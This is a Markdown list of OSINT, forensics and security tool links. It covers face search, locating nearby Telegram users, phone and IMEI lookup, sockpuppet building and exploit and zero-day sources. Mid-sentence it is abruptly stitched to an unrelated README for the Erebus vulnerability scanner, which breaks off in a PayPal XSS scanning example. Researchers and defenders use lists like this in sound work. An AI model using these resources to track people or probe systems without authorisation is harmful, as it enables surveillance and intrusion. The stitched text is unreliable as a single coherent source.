[Ghunt](https://github.com/mxrch/GHunt) - [Moriarty-Project](https://github.com/AzizKpln/Moriarty-Project) - [Mr.Holmes](https://github.com/Lucksi/Mr.Holmes) - [octosuite Advanced Github OSINT Framework](https://github.com/rly0nheart/octosuite.git) - [Toutatis](https://github.com/megadose/toutatis) - [A tool for OSINT based threat hunting](https://github.com/ninoseki/mihari) - [K𝚊𝚛𝚖𝚊 𝚟𝟸 is a Passive Open Source Intelligence](https://github.com/Dheerajmadhukar/karma_v2) - [Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools](https://github.com/elfmaster/libelfmaster) - [OSINT tool that allows you to find a person's accounts and emails + breached email](https://github.com/Greyjedix/Profil3r) - [A tool to search Aviation-related intelligence from public sources](https://github.com/n0skill/AVOSINT) - [PoC OSINT Discord user and guild information harvester](https://github.com/V3ntus/darvester) - [Automate downloading archived deleted Tweets](https://github.com/Mennaruuk/twayback) - [Discover the location of nearby Telegram users](https://github.com/tejado/telegram-nearby-map) - [OSINT Tool on Twitter and Instagram](https://github.com/xadhrit/terra) - [The World's simplest facial recognition api for python and the command line](https://github.com/ageitgey/face_recognition) - [Automation and automation of digital forensic tools](https://github.com/google/turbinia) - [E4GL30S1NT](https://github.com/C0MPL3XDEV/E4GL30S1NT) - [Commit stream finding Github repositories by extracting commit](https://github.com/x1sec/commit-stream) - [SingleFile copy of an entire web page in a single HTML file](https://github.com/gildas-lormeau/SingleFile) - [Photon Incredibly fast crawler designed for OSINT](https://github.com/s0md3v/Photon) - [infoooze](https://github.com/devXprite/infoooze) - [More](https://forum.seccodeid.com/?q=osint) # OSINT Online Tool - [Echosec](https://www.echosec.net/) - [Foller](https://foller.me/) - [Tweet Deck](https://tweetdeck.twitter.com/) - [Tweet Trips](https://www.tweetedtrips.com/) - [Tweet Tonomy](http://www.twitonomy.com/) - [Twinangulate](https://www.twiangulate.com/search/) - [Geosocial](http://geosocialfootprint.com/) - [Hash tracking](https://www.hashtracking.com/) - [Bellingcat](https://www.bellingcat.com/) - [Socmint tool](http://socmint.tools/) - [Spyse](https://spyse.com/) - [OSINT Combine](https://www.osintcombine.com/tools) - [Cell Id Lookup](https://www.reskrim.com/cek.php) - [Device Info](https://www.deviceinfo.me/) - [Cell Finder](https://cellidfinder.com/) - [GRABIFY IP](https://grabify.link/) - [Cek Rekening](https://cekrekening.id/home) - [Thatsthem](https://thatsthem.com/) - [IntelligenceX](https://intelx.io/tools) # Telegram Tool Search channel, username anymore - [Telegago](https://cse.google.com/cse?cx=006368593537057042503:efxu7xprihg#gsc.tab=0) - [TelegramDB](http://www.telegramdb.org/) - [Telegram Search Engine](https://xtea.io/) - [Telegram Database: channels, groups and users](https://t.me/s/privatelinks) - [Telegram channels and groups catalog](https://tgstat.com/) - [Telegago](https://cse.google.com/) - [Social Finder](https://socialfinder.app/list/Telegram) - [Lyzem Search](https://lyzem.com/) - [Discover The Best Telegram Channels](https://telegramchannels.me/) - [Tele Channel Overiview](https://telemetr.io/) - [telegram-phone-number-checker](https://github.com/bellingcat/telegram-phone-number-checker) - [Telepathy](https://github.com/proseltd/Telepathy) # Document and Slides Search - [Authorstream](http://www.authorstream.com) - [Find-pdf-doc](http://www.findpdfdoc.com) - [Free Full PDF](http://www.freefullpdf.com) - [PDF Search Engine](http://www.pdfsearchengine.info) - [RECAP](http://archive.recapthelaw.org) - [SlideShare](http://www.slideshare.net) - [Scribd](http://www.scribd.com) - [soPDF.com](http://www.sopdf.com) - [FileChef](https://www.filechef.com/) - [File Search Engine](https://www.filesearch.link/) - [FilePursuit](https://filepursuit.com/) - [NAPALM FTP Indexer](https://www.searchftps.net/) - [Cryptome](https://cryptome.org/) - [Finda PDF](https://www.findapdf.com/) - [Find PDF Doc](http://www.findpdfdoc.com/) # Real-Time Search, Social Media Search, and General Social Media Tools - [Buffer](https://buffer.com) - [Hashtatit](http://www.hashatit.com) - [Rival IQ](https://www.rivaliq.com) - [SocialBakers](http://www.socialbakers.com) - [SociaBlade](http://socialblade.com) - [Social Searcher](http://www.social-searcher.com) - [Mail.Ru Social Network Search](https://go.mail.ru/search_social) - [WATools](https://watools.io/) - [Profil3r](https://github.com/Rog3rSm1th/Profil3r) - [Oblivion](https://github.com/loseys/Oblivion) - [Social Analyzer](https://github.com/qeeqbox/social-analyzer) # Image Search - [7Photos](http://7photos.net) - [Baidu Images](http://image.baidu.com) - [Bing Images](http://www.bing.com/images) - [Clarify](http://clarify.io) - [Flickr](https://secure.flickr.com) - [GoodSearch Image Search](http://www.goodsearch.com/search-image) - [Google Image](https://images.google.com) - [Image Identification Project](https://www.imageidentify.com) - [MyPicsMap](http://www.mypicsmap.com) - [PhotoBucket](http://photobucket.com) - [Picsearch](http://www.picsearch.com) - [PicTriev](http://www.pictriev.com) - [StolenCameraFinder](http://www.stolencamerafinder.co.uk) - [TinEye](https://tineye.com) - Reverse image search engine. - [Worldcam](http://www.worldc.am) - [Yahoo Image Search](https://images.search.yahoo.com) - [Yandex Images](https://www.yandex.com/images) - [Betaface](https://www.betaface.com/demo.html) - [Search4faces](https://search4faces.com/) - [Pimeyes](https://pimeyes.com/en) - [Reminiai](https://remini.ai/) - [Search4face](https://search4faces.com/en/) - [Vkfacewatch](https://vk.watch/) - [Facecheck](https://facecheck.id/) - [Findmyclone](https://www.findmyclone.com/) - [Face++](https://www.faceplusplus.com/) - [AWS-Recon](https://aws.amazon.com/rekognition/) - [Azure vidio indexer](https://vi.microsoft.com/en-us) # Image Analysis - [ExifTool](https://exiftool.org/) - [Exif Search](http://www.exif-search.com) - [FotoForensics](http://www.fotoforensics.com) - [Gbimg.org](http://gbimg.org) - [Ghiro](http://www.getghiro.org) - [ImpulseAdventure](http://www.impulseadventure.com/photo/jpeg-snoop.html) - [Jeffreys Image Metadata Viewer](http://exif.regex.info/) - [JPEGsnoop](https://sourceforge.net/projects/jpegsnoop) - [Metapicz](http://metapicz.com/) - [Forensically](https://29a.ch/photo-forensics/) - [DiffChecker](https://www.diffchecker.com/image-diff/) - [ImgOps](https://imgops.com/) - [Pimeyes](https://pimeyes.com/en) - [Reminiai](https://remini.ai/) - [Search4face](https://search4faces.com/en/) - [Vkfacewatch](https://vk.watch/) - [Facecheck](https://facecheck.id/) - [Findmyclone](https://www.findmyclone.com/) - [Face++](https://www.faceplusplus.com/) - [AWS-Recon](https://aws.amazon.com/rekognition/) - [Image Analyzer](https://www.maltego.com/transform-hub/image-analyzer/) - [Pelock](https://www.pelock.com/products/steganography-online-codec) # Stock Images - [AlltheFreeStock](http://allthefreestock.com) - [Death to Stock](http://deathtothestockphoto.com) - [Freeimages](http://www.freeimages.com) - [Freestocks.org](http://freestocks.org) - [Gratisography](http://www.gratisography.com) - [IM Free](http://www.imcreator.com/free) - [ISO Republic](http://isorepublic.com) - [iStockphoto](http://www.istockphoto.com) - [Kaboompics](http://kaboompics.com) - [LibreStock](https://librestock.com) - [Life of Pix](http://www.lifeofpix.com) - [NegativeSpace](http://negativespace.co) - [New Old Stock](http://nos.twnsnd.co) - [Pixabay](https://pixabay.com) - [Pexels](https://www.pexels.com) - [Stocksnap](https://stocksnap.io) - [Shutterstock](http://www.shutterstock.com) - [tookapic](https://stock.tookapic.com) - [Unsplash](https://unsplash.com) - [Pimeyes](https://pimeyes.com/en) # Video Search and Other Video Tools - [Aol Videos](http://on.aol.com) - [Bing Videos](http://www.bing.com/?scope=video) - [Blinkx](http://www.blinkx.com) - [Clarify](http://clarify.io) - [Clip Blast](http://www.clipblast.com) - [DailyMotion](http://www.dailymotion.com) - [Deturl](http://deturl.com) - [DownloadHealper](http://www.downloadhelper.net) - [Earthcam](http://www.earthcam.com) - [Insecam](http://insecam.org/) - [Frame by Frame](https://chrome.google.com/webstore/detail/frame-by-frame/cclnaabdfgnehogonpeddbgejclcjneh/) Browser plugin that allows you to watch YouTube videos frame by frame. - [Geosearch](http://www.geosearchtool.com) - [Internet Archive: Open Source Videos](https://archive.org/details/opensource_movies) - [LiveLeak](http://www.liveleak.com) - [Metacafe](http://www.metacafe.com) - [Metatube](http://www.metatube.com) - [Montage](https://montage.storyful.com) - [Veoh](http://www.veoh.com) - [Vimeo](https://vimeo.com) - [Voxalead](http://voxalead.labs.exalead.com) - [Yahoo Video Search](http://video.search.yahoo.com) - [YouTube](https://www.youtube.com) - [YouTube Data Viewer](https://www.amnestyusa.org/citizenevidence) - [ccSUBS](http://ccsubs.com/) Download Closed Captions & Subtitles from YouTube - [YouTube Metadata](https://mattw.io/youtube-metadata/) - [YouTube Geofind](https://mattw.io/youtube-geofind/) - [Video Stabilization Methods](https://github.com/yaochih/awesome-video-stabilization) - [Azure vidio indexer](https://vi.microsoft.com/en-us) # Geospatial Research and Mapping Tools - [Atlasify](http://www.atlasify.com) - [Batchgeo](http://batchgeo.com) - [Bing Maps](http://www.bing.com/maps) - [CartoDB](https://cartodb.com) - [Colorbrewer](http://colorbrewer2.org) - [CrowdMap](https://crowdmap.com) - [Dominoc925](https://dominoc925-pages.appspot.com/mapplets/cs_mgrs.html) - [DualMaps](https://www.mapchannels.com/dualmaps7/map.htm) - [GeoGig](http://geogig.org) - [GeoNames](http://www.geonames.org) - [Esri](http://www.esri.com) - [Flash Earth](http://www.flashearth.com) - [Google Earth](http://www.google.com/earth) - [Google Earth Pro](https://www.google.com/intl/en/earth/versions/#earth-pro) - [Google Maps](https://www.google.com/maps) - [Google Maps Streetview Player](http://brianfolts.com/driver) - [Google My Maps](https://www.google.com/maps/about/mymaps) - [GPSVisualizer](http://www.gpsvisualizer.com) - [GrassGIS](http://grass.osgeo.org) - [Here](http://here.com) - [Hyperlapse](https://github.com/TeehanLax/Hyperlapse.js) - [Inspire Geoportal](http://inspire-geoportal.ec.europa.eu) - [InstantAtlas](http://www.instantatlas.com) - [Instant Google Street View](http://www.instantstreetview.com) - [Kartograph](http://kartograph.org) - [Leaflet](http://leafletjs.com) - [MapAList](http://mapalist.com) - [MapBox](https://www.mapbox.com) - [Mapbuildr](https://mapbuildr.com) - [Mapchart.net](https://mapchart.net) - [Maperitive](http://maperitive.net) - [MapHub](https://maphub.net) - [MapJam](http://mapjam.com) - [Mapline](https://mapline.com) - [Map Maker](https://maps.co) - [Mapquest](https://www.mapquest.com) - [Modest Maps](http://modestmaps.com) - [NGA GEOINT](https://github.com/ngageoint) - [OpenLayers](http://openlayers.org) - [Polymaps](http://polymaps.org) - [Perry Castaneda Library](https://www.lib.utexas.edu/maps) - [Open Street Map](http://www.openstreetmap.org) - [QGIS](http://qgis.org) - [QuickMaps](https://chrome.google.com/webstore/detail/quick-maps/bgbojmobaekecckmomemopckmeipecij) - [Scribble Maps](http://scribblemaps.com) - [Terrapattern](http://www.terrapattern.com) - [Tableau](http://www.tableausoftware.com) - [Timescape](https://www.timescape.io) - [View in Google Earth](http://www.mgmaps.com/kml/#view) - [Wikimapia](http://wikimapia.org) - [World Aeronautical Database](http://worldaerodata.com) - [WorldMap Harvard](http://worldmap.harvard.edu) - [ViaMichelin](http://www.viamichelin.com) - [Yahoo Maps](https://maps.yahoo.com) - [Zeemaps](https://www.zeemaps.com) - [Sentinel Hub](https://www.sentinel-hub.com/explore/sentinelplayground/) - [Maxar](https://discover.digitalglobe.com/) - [USGS (EarthExplorer)](https://earthexplorer.usgs.gov/) - [Zoom Earth](https://zoom.earth/) - [Remote Pixel](https://remotepixel.ca/projects/index.html) - [SunCalc](https://www.suncalc.org/) - [ArcGIS](https://livingatlas.arcgis.com/en/browse/) - [Pic2Map](https://www.pic2map.com/) - [Mapillary](https://www.mapillary.com/app/) - [KartaView](https://kartaview.org/map/) - [Satellites Pro](https://satellites.pro/) - [Liveuamap](https://liveuamap.com/) - [Descartes Labs](https://maps.descarteslabs.com/) - [Baidu Maps](https://map.baidu.com/) - [MapChecking](https://www.mapchecking.com/) - [Windy](https://www.windy.com/) - [SOAR](https://soar.earth/) - [digiKam](https://www.digikam.org/) - [geoq](https://github.com/ngageoint/geoq) - [gvision](https://github.com/GONZOsint/gvision) # Fact Checking - [About Urban Legends](http://urbanlegends.about.com) - [Captin Fact](https://captainfact.io/) - [Check](https://meedan.com/check) - [Citizen Desk](https://www.sourcefabric.org/en/citizendesk) - [Emergent](http://www.emergent.info) - [Fact Check](http://www.factcheck.org) - [Full Fact](https://fullfact.org) - [MediaBugs](http://mediabugs.org) - [Snopes](http://www.snopes.com) The definitive Internet reference source for urban legends, folklore, myths, rumors, and misinformation. - [Verification Handbook](http://verificationhandbook.com) - [Verification Junkie](http://verificationjunkie.com) - [Verily](https://veri.ly) # Server Information Gathering - [Testssl](https://testssl.sh/) - [Nesus](https://www.tenable.com/products/nessus) # CTF Analysis & Exploit - [Cybercheff](https://gchq.github.io/CyberChef/) - [Bettercap](https://github.com/bettercap/bettercap) Framework to perform MITM (Man in the Middle) attacks. - [Yersinia](https://github.com/tomac/yersinia) A framework for layer 2 attacks - [FeatherDuster](https://github.com/nccgroup/featherduster) An automated, modular cryptanalysis tool - [Hash Extender](https://github.com/iagox86/hash_extender) A utility tool for performing hash length extension attacks - [Hashcat](https://hashcat.net/hashcat/) Password cracking - [DLLInjector ](https://github.com/OpenSecurityResearch/dllinjector) Inject dlls in processes - [Metasploit](https://www.metasploit.com/) Penetration testing software and exploit - [Pwntools](https://github.com/Gallopsled/pwntools) CTF framework and exploit development library - [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) Framework for ROP exploitation - [Exiftool](https://exiftool.org/) Read, write and edit file metadata - [Malzilla](https://malzilla.sourceforge.net/downloads.html) Malware hunting tool - [Zmap](https://zmap.io/) An open-source network scanner. - [Nmap](https://nmap.org/) Net mapping and port scanner - [Wireshark](https://www.wireshark.org/) Analyze the network dumps - [Apktool](https://ibotpeaches.github.io/Apktool/) Android Decompiler - [Ninja Binary](https://binary.ninja/) Binary analysis framework - [Binwalk](https://github.com/ReFirmLabs/binwalk) Analyze, reverse engineer, and extract firmware images - [GDB](https://www.sourceware.org/gdb/) The GNU project debugger - [GEF](https://github.com/hugsy/gef) Advanced debugging capabilities for exploit devs & reverse engineers on Linux - [IDA](https://www.hex-rays.com/ida-pro/) Most used Reversing software - [PEDA](https://github.com/longld/peda) Python Exploit Development Assistance for GDB - [Radare2](https://github.com/radareorg/radare2) UNIX-like reverse engineering framework and command-line toolset - [Windbg](http://www.windbg.org/) Windows debugger distributed by Microsoft - [Boomerang](https://github.com/BoomerangDecompiler/boomerang) Decompile x86 binaries to C - [Detox](http://relentless-coding.org/projects/jsdetox/install) A Javascript malware analysis tool - [SmartDeblur](https://github.com/Y-Vladimir/SmartDeblur) Restoration of defocused and blurred photos/images - [ImageMagick](http://www.imagemagick.org/script/index.php) Tool for manipulating images - [Exiv2](https://exiv2.org/manpage.html) Image metadata manipulation tool - [Stegbreak](https://linux.die.net/man/1/stegbreak) Launches brute-force dictionary attacks on JPG image - [Steghide](https://steghide.sourceforge.net/) Hide data in various kind of images - [Stegsolve](https://github.com/zardus/ctf-tools/blob/master/stegsolve/install) Apply various steganography techniques to images - [SearchSploit](https://www.exploit-db.com/searchsploit) Command line search tool for Exploit-DB - [Exploitalert](https://www.exploitalert.com/browse-exploit.html) List exploiting and vuln - [Lollabs](https://lolbas-project.github.io/) Windows exploiting - [GtfoBins](https://gtfobins.github.io/) Linux exploiting - [Hacktricks](https://book.hacktricks.xyz/welcome/readme) List exploit and vuln cheat sheet walkthrough - [Payload all the things](https://github.com/swisskyrepo/PayloadsAllTheThings) Example and payload injection - [All about bug bounty](https://github.com/daffainfo/AllAboutBugBounty) Bypasses, payloads, Reconnaissance and etc - [Searchsploit](https://www.exploit-db.com/searchsploit) Search more exploit from edb # Zero Day - [0day](https://0day.today/) - [Zerodium](https://zerodium.com/) - [0day fans](https://0dayfans.com/) # Cryptocurrency Investigation - [Blockchain](https://www.blockchain.com/) - [Flashpoint](https://flashpoint.io/resources/research/flashpoint-and-chainalysis-investigate-hydra-where-cryptocurrency-cybercrime-goes-dark/) - [Intel471](https://intel471.com/) - [Tatum](https://tatum.io/) - [Ciphertrace](https://ciphertrace.com/) - [Bitcoin Abuse](https://www.bitcoinabuse.com/) - [Blockchain-Info](https://www.maltego.com/transform-hub/blockchain-info/) - [GraphSense](https://github.com/INTERPOL-Innovation-Centre/GraphSense-Maltego-transform) # Cell Investigation - [Opencellid](https://opencellid.org/) - [CellTower Locator - Cell2gps](http://www.cell2gps.com/) - [Cell-id Query](https://www.cell-id.info/?lang=en) - [Location API](unwiredlabs) - [Cell Mapping](https://www.cellmapper.net/) - [Global Internet Infrastructure Map](https://www.infrapedia.com/) - [Spy Dialer](https://spydialer.com/) - [Phone Validator](https://www.phonevalidator.com/) - [Free Operator Search](https://freecarrierlookup.com/) - [HLR Lookup](https://www.hlrlookup.com/) - [Ceebydith HLR Lookup](https://ceebydith.com/cek-hlr-lokasi-hp.html) - [Free HLR](https://www.free-hlr.com/) - [HLR Lookup API](https://www.hlr-lookups.com/) - [Maltego Phone Search](https://www.maltego.com/transform-hub/phonesearch/) - [Emobiletracker](https://www.emobiletracker.com/) - [Phone Validator](https://www.phonevalidator.com/index.aspx) - [Reverse Phone](https://www.reversephonecheck.com/) - [Reverse Phone Lookup](https://www.reversephonelookup.com/) - [OpenCNAM](https://docs.maltego.com/support/solutions/articles/15000045282-maltego-opencnam-transforms) - [Search Country Operator (IMSI)](https://www.heicard.com/en/operator.html) - [Analysis of IMSI numbers](https://www.numberingplans.com/?page=analysis&sub=imsinr) - [World MCC & MNC Code](https://en.wikipedia.org/wiki/Mobile_country_code) - [World MCC & MNC Code 2](https://www.mcc-mnc.com/) - [World Mobile Network Code](https://en.wikipedia.org/wiki/Mobile_network_codes_in_ITU_region_5xx_(Oceania)) - [World Network Coverage](https://www.nperf.com/en/map/ID/-/-/signal/?ll=-2.5678942164342513&lg=118.01999999999998&zoom=5) - [Profone GSM Tracker](https://cellphonetrackers.org/gsm/gsm-tracker.php) # IMEI Investigation - [SNDeepinfo](https://sndeep.info/) - [Imei Numbers](http://imei-number.com/) - [Nobbi](http://www.nobbi.com/) - [IMEI Info](https://www.imei.info/) - [International Numberingplans](https://www.numberingplans.com/) - [IPhone IMEI](https://iunlocker.com/en/check_imei.php) # Chat Apps Investigation WhatsApp - [Analyze your WhatsApp Chat](https://whatsanalyze-80665.web.app/) - [Chat Visualizer](https://chatvisualizer.com/) - [WhatsApp Group Links](https://whatsgrouplink.com/) - [Download WhatsApp Profile Picture](https://watools.io/download-profile-picture) Telegram - [TelegramDB](http://www.telegramdb.org/) - [Telegram Search Engine](https://xtea.io/) - [Telegram Database: channels, groups and users](https://t.me/s/privatelinks) - [Telegram channels and groups catalog](https://tgstat.com/) - [Telegago](https://cse.google.com/) - [Social Finder](https://socialfinder.app/list/Telegram) - [Lyzem Search](https://lyzem.com/) - [Discover The Best Telegram Channels](https://telegramchannels.me/) - [Tele Channel Overiview](https://telemetr.io/) # Build Sockpuppet Accounts Build your sockpuppet account and proctect your privacy - [Thispersondoesnotexist](https://www.thispersondoesnotexist.com/) - [Protonmail](https://protonmail.com/) - [Nordvpn](https://nordvpn.com/) - [NOX](https://www.bignox.com/) - [Browser Extension](https://nordvpn.com/blog/use-these-browser-extensions-for-your-privacy/) - [Burner Phone Number](https://www.mintmobile.com/) - [Phone Burner](https://www.phoneburner.com/) - [Hushed](https://hushed.com/) - [Temp Phone Number](https://temporary-phone-number.com/) - [Temp Mail 1](https://mail.tm/en/) - [Temp Mail 2](https://temp-mail.org/en/) - [Temp Mail 3](https://tempmailo.com/) - [Cryptocurrency Payment Monero](https://www.getmonero.org/) - [Cryptocurrency Payment Bitcoin](https://bitcoin.org/en/) - [Openpgp](https://www.openpgp.org/) - [Operating System](https://tails.boum.org/) - [Zmail](https://zmail.sourceforge.net/) - [Open DNS](https://www.opendns.com/home-internet-security/) - [I2P](https://geti2p.net/en/) - [TOR](https://www.torproject.org/download/) Social Network and blogging - Wordpress - Blogger - Medium - Facebook - Instagram # Enhance Image Quality - [Letsenhance](https://letsenhance.io/) - [Cutout](https://www.cutout.pro/photo-enhancer-sharpener-upscaler) - [Upscale](https://upscalepics.com/) - [Canva](https://www.canva.com/features/image-enhancer/) - [Adobe](https://www.adobe.com/express/feature/image/enhance) - [Picwish](https://picwish.com/unblur-image-portrait) - [Fotor](https://www.fotor.com/features/unblur-image/) - [SIUN](https://github.com/minyuanye/SIUN) - [DPED](https://github.com/aiff22/DPED) - [neural-enhance](https://dockship.io/model/neural-enhance/5de4333901afe15d4ec10393) - [neural-enhance](https://github.com/alexjc/neural-enhance) - [Reminiai](https://remini.ai/) - [Depix](https://github.com/beurtschipper/Depix) - [Realesrgan](https://replicate.com/xinntao/realesrgan) # Locations Data Mapping - [Google maps](https://www.google.co.id/maps) - [Social geo lens](https://www.osintcombine.com/social-geo-lens) - [Open street map](https://www.openstreetmap.org/) - [Google Maps Geocoding](https://www.maltego.com/transform-hub/google-maps-geocoding-transforms/) - [Googleearthengine](https://earthengine.google.com/#intro) # Discord Server Search - [Discord servers](https://discordservers.com/) - [Discover servers](https://disboard.org/) - [Discord history tracker](https://www.dht.chylex.com/) # Darkweb Intelligence - [Dark Tracer](https://darktracer.com/) - [Darkweb bookmarks](https://www.osintcombine.com/dw-osint-bookmarks) - [Maltego digital shadows transform](https://www.maltego.com/transform-hub/digital-shadows/) - [Maltego cybersixgill transform](https://www.maltego.com/transform-hub/cybersixgill/) - [Doge Darknet Osint Graph Explorer](https://github.com/pielco11/DOGE) - [Maltego social links professional transform](https://www.maltego.com/transform-hub/social-links-pro/) - [TorBot](https://github.com/DedSecInside/TorBot) - [Darkfeed](https://darkfeed.io/) # Digital Forensics - [Yggdrasil](https://github.com/Jarl-Bjoern/Yggdrasil/) - [MISP](https://www.misp-project.org/) - [Maltego](https://www.maltego.com/) - [Filesec](https://filesec.io/) - [Lolbas](https://lolbas-project.github.io/) - [Logstash kibana](https://www.elastic.co/logstash/) - [Kibana](https://www.elastic.co/kibana/) - [Extundelete Ext3 or ext4 partition recovery](https://extundelete.sourceforge.net/) - [TestDisk](https://www.cgsecurity.org/wiki/TestDisk_Download) - [VirusTotal](https://www.virustotal.com/gui/home/upload) - [Avilla Forensics](https://forum.seccodeid.com/d/avillaforensics-mobile-digital-forensics) - [Autopsy](https://www.autopsy.com/) - [Recuva](https://www.ccleaner.com/recuva) - [Magnetforensics](https://www.magnetforensics.com/free-tools/) - [Opentxt](https://www.opentext.com/products/security-cloud) - [Ntfstool Forensics](https://forum.seccodeid.com/d/ntfstool-forensics-tool-for-ntfs-parser-mft-bitlocker-deleted-files) - [Sleuthkit](https://www.sleuthkit.org/sleuthkit/) - [SIFT SANS](https://www.sans.org/tools/sift-workstation/) - [SIFT CLI](https://github.com/teamdfir/sift-cli/releases/tag/v1.8.5) - [HYAS Insight](https://www.maltego.com/transform-hub/hyas-insight/) # Write Your Investigation - [Yoga](https://github.com/WebBreacher/yoga) - [Malteo CaseFile](https://docs.maltego.com/support/solutions/articles/15000018948-what-is-maltego-casefile-) # Securing Your Privacy - [Eraser](https://eraser.heidi.ie/) - [Thunderbird](https://www.thunderbird.net/en-US/) - [Ublock origin](https://github.com/gorhill/uBlock) - [Zmail](https://zmail.sourceforge.net/) - [Open DNS](https://www.opendns.com/home-internet-security/) - [I2P](https://geti2p.net/en/) - [Gnupg](https://gnupg.org/) - [HTTPS Everywhere](https://www.eff.org/https-everywhere/) - [Pelock](https://www.pelock.com/products/steganography-online-codec) - [Tails OS](https://tails.boum.org/) - [WOT](https://www.mywot.com/) - [Temp Mail 1](https://mail.tm/en/) - [Temp Mail 2](https://temp-mail.org/en/) - [Temp Mail 3](https://tempmailo.com/) - [Phone Burner](https://www.phoneburner.com/) - [Hushed](https://hushed.com/) Payment - [Bitcoin](https://bitcoin.org/id/) - [Monero](https://www.getmonero.org/) # Fraud Checker - [Cek Rekening](https://cekrekening.id/home) - Indonesian By Kominfo - [Kredibel](https://www.kredibel.com/) - Indonesian - [Verihub](https://verihubs.com/) - Indonesian - [Scamadviser](https://www.maltego.com/transform-hub/scamadviser/) - [Ipqualityscore](https://docs.maltego.com/support/solutions/articles/15000041408-maltego-ipqualityscore-transforms#overview-0-0) - [OpenCNAM](https://docs.maltego.com/support/solutions/articles/15000045282-maltego-opencnam-transforms) - [Fullcontact](https://www.fullcontact.com/) # Content Removal & Strict Media content Strict, removing and minimize your data on the internet - [Google image removal](https://support.google.com/websearch/answer/4628134) Remove your image from Google - [Stopncii](https://stopncii.org) Free tool designed to support victims of Non-Consensual Intimate Image (NCII) abuse - [Bing content removal](www.bing.com/webmasters/tools/contentremoval) Chech the detail on [here](https://www.bing.com/webmasters/help/bing-content-removal-tool-cb6c294d) - [Google content removal](https://search.google.com/search-console/remove-outdated-content) Check the detail on [here](https://support.google.com/websearch/troubleshooter/3111061?hl=id) - [Web archiver remover](https://help.archive.org/help/how-do-i-request-to-remove-something-from-archive-org/) Check the detail [here](https://help.archive.org/help/removing-your-item-pages-from-archive-org/) and [here](https://www.joshualowcock.com/guide/how-to-delete-your-site-from-the-internet-archive-wayback-machine-archive-org/) view detail on [Help web archive](https://help.archive.org/) - [Facebook Privacy](https://www.facebook.com/help/124518907626945) Strict and disable bot crawl search engine index account - [Instagram Privacy](https://help.instagram.com/147542625391305) Strict and disable bot crawl search engine index account *NB : Its taking to long, you need to patiently
<h1 align="center"> <br> <img src="https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d06120c6-10fa-49a6-8e5a-6de6024c71b5/ddaf69q-cbe86b59-8049-40b6-96ca-bb1929a0b073.gif?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2QwNjEyMGM2LTEwZmEtNDlhNi04ZTVhLTZkZTYwMjRjNzFiNVwvZGRhZjY5cS1jYmU4NmI1OS04MDQ5LTQwYjYtOTZjYS1iYjE5MjlhMGIwNzMuZ2lmIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.n65EW1oBAX5Uc1gs3SvkpXvS-3Tc1uaP7BRVhSj04DE" width="200px" alt="Erebus"> </h1> <h4 align="center">Fast and customisable parameter based vulnerability scanner based on simple YAML Rules</h4> <p align="center"> <a href="https://goreportcard.com/report/github.com/ethicalhackingplayground/erebus"><img src="https://goreportcard.com/badge/github.com/ethicalhackingplayground/erebus"></a> <a href="https://github.com/ethicalhackingplayground/erebus/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a> <a href="https://github.com/ethicalhackingplayground/erebus/releases"><img src="https://img.shields.io/github/release/ethicalhackingplayground/erebus"></a> <a href="https://twitter.com/z0idsec"><img src="https://img.shields.io/twitter/follow/z0idsec.svg?logo=twitter"></a> <a href="https://discord.gg/MQWCem5b"><img src="https://img.shields.io/discord/862900124740616192.svg?logo=discord"></a> </p> <p align="center"> <a href="#how-templates-work">How</a> • <a href="#install-erebus">Install</a> • <a href="#erebus-templates">Templates</a> • <a href="#setup-erebus-interceptor">Interceptor</a> • <a href="#usage">Usage</a> • <a href="https://discord.gg/MQWCem5b">Join Discord</a> </p> --- Erebus is used to test every parameter across targets based on Yaml templates leading to zero false positives and providing fast scanning on large number of hosts. Erebus offers many useful features including an intercepting proxy which allows researchers to browse the web, click on links and erebus will test every parameter that passes through the proxy. We have a [dedicated repository](https://github.com/ethicalhackingplayground/erebus-templates) that houses various types of vulnerability templates. ## How templates work <h3 align="center"> <img src="static/yaml.png" alt="yaml-templates-flow" width="700px"></a> </h3> # Install Erebus ```sh ▶ GO111MODULE=off go get -u -v github.com/ethicalhackingplayground/erebus/erebus ``` # Install Templates ```sh ▶ erebus -ut ``` <table> <tr> <td> ### Erebus Templates Erebus has had built-in support for automatic update/download templates (https://github.com/ethicalhackingplayground/erebus/releases/latest). [**Erebus-Templates**](https://github.com/ethicalhackingplayground/erebus-templates) project provides a community-contributed list of ready-to-use templates that can be used with part of your testing. You may use the `-ut` flag to update the nuclei templates at any time. </td> </tr> </table> <table> <tr> <td> ### Setup Erebus Interceptor Make sure to setup a proxy in your browser before you use the **erebus interceptor** for firefox go to ▶ Settings ▶ General ▶ Network Settings ▶ Manual proxy configuration type in **127.0.0.1** in HTTP Proxy then for the port type in **8080** make sure to enable **Also use this proxy for FTP and HTTPS** </td> </tr> </table> <table> <tr> <td> ### Install the SSL Certificates to use HTTPS I have provided the certificates for you to use for **HTTPS** testing, all you need to do is install these by: ▶ Settings ▶ Privacy & Security ▶ Certificates ▶ View Certificates ▶ Import ▶ Select the **.crt** file in the erebus directory and proceed by trusting and installing. </td> </tr> </table> ### Usage ```sh erebus -h ``` This will display help for the tool. Here are all the switches it supports. <details> <summary> 👉 erebus help menu 👈</summary> ``` Usage of erebus: -burp-sitemap string scan burp xml sitemap (without base64 decoded) -c int the number of concurrent requsts (default 100) -crawl crawl through each intercepted request -depth int the crawl depth (default 5) -interceptor intercept the requests through the proxy and test each parameter -o string output results to a file -p string the port on which the interception proxy will listen on (default "8080") -scope string the scope for the proxy intercetor -secure determaines if the connection is secure or not -silent silent (only show vulnerable urls) -t string use the templates with all our yaml rules instead -tc string Use other tools by executing an os command (default "qsreplace") -ut Install or update the erebus-templates ``` </details> # Usage Here are a few examples on how to use the erebus scanner for part of your testing. ### Intercept and Crawl on HTTP Scanning for XSS vulnerabilities using the intercepting proxy with all of paypal inscope while crawling on HTTP domains. ```sh ▶ erebus -t 